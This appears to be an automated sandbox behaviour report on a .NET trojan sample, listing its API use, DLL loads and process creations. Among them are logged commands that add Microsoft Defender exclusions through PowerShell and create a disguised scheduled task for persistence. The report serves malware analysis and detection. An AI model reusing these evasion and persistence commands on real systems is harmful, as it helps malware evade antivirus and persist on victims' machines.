Source: 0.2.SecuriteInfo.com.MSIL.Kryptik.HDZY.tr.18191.767.exe.362d868.2.raw.unpack, P7gP.cs	Cryptographic APIs: 'TransformFinalBlock'
Source: 0.2.SecuriteInfo.com.MSIL.Kryptik.HDZY.tr.18191.767.exe.362d868.2.raw.unpack, P7gP.cs	Cryptographic APIs: 'TransformFinalBlock'
Source: 0.2.SecuriteInfo.com.MSIL.Kryptik.HDZY.tr.18191.767.exe.362d868.2.raw.unpack, Xehk6f9P.cs	Cryptographic APIs: 'TransformFinalBlock'
Source: 0.2.SecuriteInfo.com.MSIL.Kryptik.HDZY.tr.18191.767.exe.362d868.2.raw.unpack, Xehk6f9P.cs	Cryptographic APIs: 'TransformFinalBlock', 'CreateDecryptor'

Source: 0.2.SecuriteInfo.com.MSIL.Kryptik.HDZY.tr.18191.767.exe.8440000.5.raw.unpack, Ck9KUH03mPl1BXVZKg.cs	Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
Source: 0.2.SecuriteInfo.com.MSIL.Kryptik.HDZY.tr.18191.767.exe.379a470.1.raw.unpack, e4NXZjNjHV5vmgvMPk.cs	Security API names: _0020.SetAccessControl
Source: 0.2.SecuriteInfo.com.MSIL.Kryptik.HDZY.tr.18191.767.exe.379a470.1.raw.unpack, e4NXZjNjHV5vmgvMPk.cs	Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
Source: 0.2.SecuriteInfo.com.MSIL.Kryptik.HDZY.tr.18191.767.exe.379a470.1.raw.unpack, e4NXZjNjHV5vmgvMPk.cs	Security API names: _0020.AddAccessRule
Source: 0.2.SecuriteInfo.com.MSIL.Kryptik.HDZY.tr.18191.767.exe.8440000.5.raw.unpack, e4NXZjNjHV5vmgvMPk.cs	Security API names: _0020.SetAccessControl
Source: 0.2.SecuriteInfo.com.MSIL.Kryptik.HDZY.tr.18191.767.exe.8440000.5.raw.unpack, e4NXZjNjHV5vmgvMPk.cs	Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
Source: 0.2.SecuriteInfo.com.MSIL.Kryptik.HDZY.tr.18191.767.exe.8440000.5.raw.unpack, e4NXZjNjHV5vmgvMPk.cs	Security API names: _0020.AddAccessRule
Source: 0.2.SecuriteInfo.com.MSIL.Kryptik.HDZY.tr.18191.767.exe.379a470.1.raw.unpack, Ck9KUH03mPl1BXVZKg.cs	Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()

Source: classification engine

Classification label: mal100.troj.spyw.evad.winEXE@19/15@1/1

Source: C:\Users\user\Desktop\SecuriteInfo.com.MSIL.Kryptik.HDZY.tr.18191.767.exe

File created: C:\Users\user\AppData\Roaming\eFzAvsOm.exe

Jump to behavior

Source: C:\Users\user\AppData\Roaming\eFzAvsOm.exe	Mutant created: \Sessions\1\BaseNamedObjects\HcmqxTYNyFuTiopJcH
Source: C:\Users\user\AppData\Roaming\eFzAvsOm.exe	Mutant created: NULL
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7492:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7452:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:8060:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7544:120:WilError_03

Source: C:\Users\user\Desktop\SecuriteInfo.com.MSIL.Kryptik.HDZY.tr.18191.767.exe

File created: C:\Users\user\AppData\Local\Temp\tmp9A0C.tmp

Jump to behavior

Source: SecuriteInfo.com.MSIL.Kryptik.HDZY.tr.18191.767.exe

Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ

Source: SecuriteInfo.com.MSIL.Kryptik.HDZY.tr.18191.767.exe

Static file information: TRID: Win32 Executable (generic) Net Framework (10011505/4) 49.80%

Source: C:\Users\user\Desktop\SecuriteInfo.com.MSIL.Kryptik.HDZY.tr.18191.767.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Users\user\Desktop\SecuriteInfo.com.MSIL.Kryptik.HDZY.tr.18191.767.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
Source: C:\Users\user\Desktop\SecuriteInfo.com.MSIL.Kryptik.HDZY.tr.18191.767.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
Source: C:\Users\user\AppData\Roaming\eFzAvsOm.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Users\user\AppData\Roaming\eFzAvsOm.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
Source: C:\Users\user\AppData\Roaming\eFzAvsOm.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor

Source: C:\Users\user\Desktop\SecuriteInfo.com.MSIL.Kryptik.HDZY.tr.18191.767.exe

File read: C:\Users\user\Desktop\desktop.ini

Jump to behavior

Source: C:\Users\user\Desktop\SecuriteInfo.com.MSIL.Kryptik.HDZY.tr.18191.767.exe

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: SecuriteInfo.com.MSIL.Kryptik.HDZY.tr.18191.767.exe	ReversingLabs: Detection: 15%
Source: SecuriteInfo.com.MSIL.Kryptik.HDZY.tr.18191.767.exe	Virustotal: Detection: 30%

Source: SecuriteInfo.com.MSIL.Kryptik.HDZY.tr.18191.767.exe

String found in binary or memory: $72794fd6-9579-4364-adda-1580f4b1038b

Source: C:\Users\user\Desktop\SecuriteInfo.com.MSIL.Kryptik.HDZY.tr.18191.767.exe

File read: C:\Users\user\Desktop\SecuriteInfo.com.MSIL.Kryptik.HDZY.tr.18191.767.exe

Jump to behavior

Source: unknown	Process created: C:\Users\user\Desktop\SecuriteInfo.com.MSIL.Kryptik.HDZY.tr.18191.767.exe "C:\Users\user\Desktop\SecuriteInfo.com.MSIL.Kryptik.HDZY.tr.18191.767.exe"
Source: C:\Users\user\Desktop\SecuriteInfo.com.MSIL.Kryptik.HDZY.tr.18191.767.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\SecuriteInfo.com.MSIL.Kryptik.HDZY.tr.18191.767.exe"
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\SecuriteInfo.com.MSIL.Kryptik.HDZY.tr.18191.767.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\eFzAvsOm.exe"
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\SecuriteInfo.com.MSIL.Kryptik.HDZY.tr.18191.767.exe	Process created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\eFzAvsOm" /XML "C:\Users\user\AppData\Local\Temp\tmp9A0C.tmp"
Source: C:\Windows\SysWOW64\schtasks.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\SecuriteInfo.com.MSIL.Kryptik.HDZY.tr.18191.767.exe	Process created: C:\Users\user\Desktop\SecuriteInfo.com.MSIL.Kryptik.HDZY.tr.18191.767.exe "C:\Users\user\Desktop\SecuriteInfo.com.MSIL.Kryptik.HDZY.tr.18191.767.exe"
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\wbem\WmiPrvSE.exe C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
Source: unknown	Process created: C:\Users\user\AppData\Roaming\eFzAvsOm.exe C:\Users\user\AppData\Roaming\eFzAvsOm.exe
Source: C:\Users\user\AppData\Roaming\eFzAvsOm.exe	Process created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\eFzAvsOm" /XML "C:\Users\user\AppData\Local\Temp\tmpADE2.tmp"
Source: C:\Windows\SysWOW64\schtasks.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\AppData\Roaming\eFzAvsOm.exe	Process created: C:\Users\user\AppData\Roaming\eFzAvsOm.exe "C:\Users\user\AppData\Roaming\eFzAvsOm.exe"
Source: C:\Users\user\Desktop\SecuriteInfo.com.MSIL.Kryptik.HDZY.tr.18191.767.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\SecuriteInfo.com.MSIL.Kryptik.HDZY.tr.18191.767.exe"	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.MSIL.Kryptik.HDZY.tr.18191.767.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\eFzAvsOm.exe"	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.MSIL.Kryptik.HDZY.tr.18191.767.exe	Process created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\eFzAvsOm" /XML "C:\Users\user\AppData\Local\Temp\tmp9A0C.tmp"	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.MSIL.Kryptik.HDZY.tr.18191.767.exe	Process created: C:\Users\user\Desktop\SecuriteInfo.com.MSIL.Kryptik.HDZY.tr.18191.767.exe "C:\Users\user\Desktop\SecuriteInfo.com.MSIL.Kryptik.HDZY.tr.18191.767.exe"	Jump to behavior
Source: C:\Users\user\AppData\Roaming\eFzAvsOm.exe	Process created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\eFzAvsOm" /XML "C:\Users\user\AppData\Local\Temp\tmpADE2.tmp"
Source: C:\Users\user\AppData\Roaming\eFzAvsOm.exe	Process created: C:\Users\user\AppData\Roaming\eFzAvsOm.exe "C:\Users\user\AppData\Roaming\eFzAvsOm.exe"

Source: C:\Users\user\Desktop\SecuriteInfo.com.MSIL.Kryptik.HDZY.tr.18191.767.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.MSIL.Kryptik.HDZY.tr.18191.767.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.MSIL.Kryptik.HDZY.tr.18191.767.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.MSIL.Kryptik.HDZY.tr.18191.767.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.MSIL.Kryptik.HDZY.tr.18191.767.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.MSIL.Kryptik.HDZY.tr.18191.767.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.MSIL.Kryptik.HDZY.tr.18191.767.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.MSIL.Kryptik.HDZY.tr.18191.767.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.MSIL.Kryptik.HDZY.tr.18191.767.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.MSIL.Kryptik.HDZY.tr.18191.767.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.MSIL.Kryptik.HDZY.tr.18191.767.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.MSIL.Kryptik.HDZY.tr.18191.767.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.MSIL.Kryptik.HDZY.tr.18191.767.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.MSIL.Kryptik.HDZY.tr.18191.767.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.MSIL.Kryptik.HDZY.tr.18191.767.exe	Section loaded: dwrite.dll	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.MSIL.Kryptik.HDZY.tr.18191.767.exe	Section loaded: textshaping.dll	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.MSIL.Kryptik.HDZY.tr.18191.767.exe	Section loaded: windowscodecs.dll	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.MSIL.Kryptik.HDZY.tr.18191.767.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.MSIL.Kryptik.HDZY.tr.18191.767.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.MSIL.Kryptik.HDZY.tr.18191.767.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.MSIL.Kryptik.HDZY.tr.18191.767.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.MSIL.Kryptik.HDZY.tr.18191.767.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.MSIL.Kryptik.HDZY.tr.18191.767.exe	Section loaded: edputil.dll	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.MSIL.Kryptik.HDZY.tr.18191.767.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.MSIL.Kryptik.HDZY.tr.18191.767.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.MSIL.Kryptik.HDZY.tr.18191.767.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.MSIL.Kryptik.HDZY.tr.18191.767.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.MSIL.Kryptik.HDZY.tr.18191.767.exe	Section loaded: windows.staterepositoryps.dll	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.MSIL.Kryptik.HDZY.tr.18191.767.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.MSIL.Kryptik.HDZY.tr.18191.767.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.MSIL.Kryptik.HDZY.tr.18191.767.exe	Section loaded: appresolver.dll	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.MSIL.Kryptik.HDZY.tr.18191.767.exe	Section loaded: bcp47langs.dll	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.MSIL.Kryptik.HDZY.tr.18191.767.exe	Section loaded: slc.dll	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.MSIL.Kryptik.HDZY.tr.18191.767.exe	Section loaded: sppc.dll	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.MSIL.Kryptik.HDZY.tr.18191.767.exe	Section loaded: onecorecommonproxystub.dll	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.MSIL.Kryptik.HDZY.tr.18191.767.exe	Section loaded: onecoreuapcommonproxystub.dll	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.MSIL.Kryptik.HDZY.tr.18191.767.exe	Section loaded: ntmarta.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: atl.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msisip.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wshext.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: appxsip.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: opcservices.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: secur32.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: microsoft.management.infrastructure.native.unmanaged.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: miutils.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wmidcom.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: dpapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: atl.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msisip.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wshext.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: appxsip.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: opcservices.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: secur32.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: microsoft.management.infrastructure.native.unmanaged.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: miutils.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wmidcom.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: dpapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Windows\SysWOW64\schtasks.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\SysWOW64\schtasks.exe	Section loaded: taskschd.dll	Jump to behavior
Source: C:\Windows\SysWOW64\schtasks.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.MSIL.Kryptik.HDZY.tr.18191.767.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.MSIL.Kryptik.HDZY.tr.18191.767.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.MSIL.Kryptik.HDZY.tr.18191.767.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.MSIL.Kryptik.HDZY.tr.18191.767.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.MSIL.Kryptik.HDZY.tr.18191.767.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.MSIL.Kryptik.HDZY.tr.18191.767.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.MSIL.Kryptik.HDZY.tr.18191.767.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.MSIL.Kryptik.HDZY.tr.18191.767.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.MSIL.Kryptik.HDZY.tr.18191.767.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.MSIL.Kryptik.HDZY.tr.18191.767.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.MSIL.Kryptik.HDZY.tr.18191.767.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.MSIL.Kryptik.HDZY.tr.18191.767.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.MSIL.Kryptik.HDZY.tr.18191.767.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.MSIL.Kryptik.HDZY.tr.18191.767.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.MSIL.Kryptik.HDZY.tr.18191.767.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.MSIL.Kryptik.HDZY.tr.18191.767.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.MSIL.Kryptik.HDZY.tr.18191.767.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.MSIL.Kryptik.HDZY.tr.18191.767.exe	Section loaded: vaultcli.dll	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.MSIL.Kryptik.HDZY.tr.18191.767.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.MSIL.Kryptik.HDZY.tr.18191.767.exe	Section loaded: rasapi32.dll	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.MSIL.Kryptik.HDZY.tr.18191.767.exe	Section loaded: rasman.dll	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.MSIL.Kryptik.HDZY.tr.18191.767.exe	Section loaded: rtutils.dll	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.MSIL.Kryptik.HDZY.tr.18191.767.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.MSIL.Kryptik.HDZY.tr.18191.767.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.MSIL.Kryptik.HDZY.tr.18191.767.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.MSIL.Kryptik.HDZY.tr.18191.767.exe	Section loaded: iphlpapi.dll	Jump to behavior
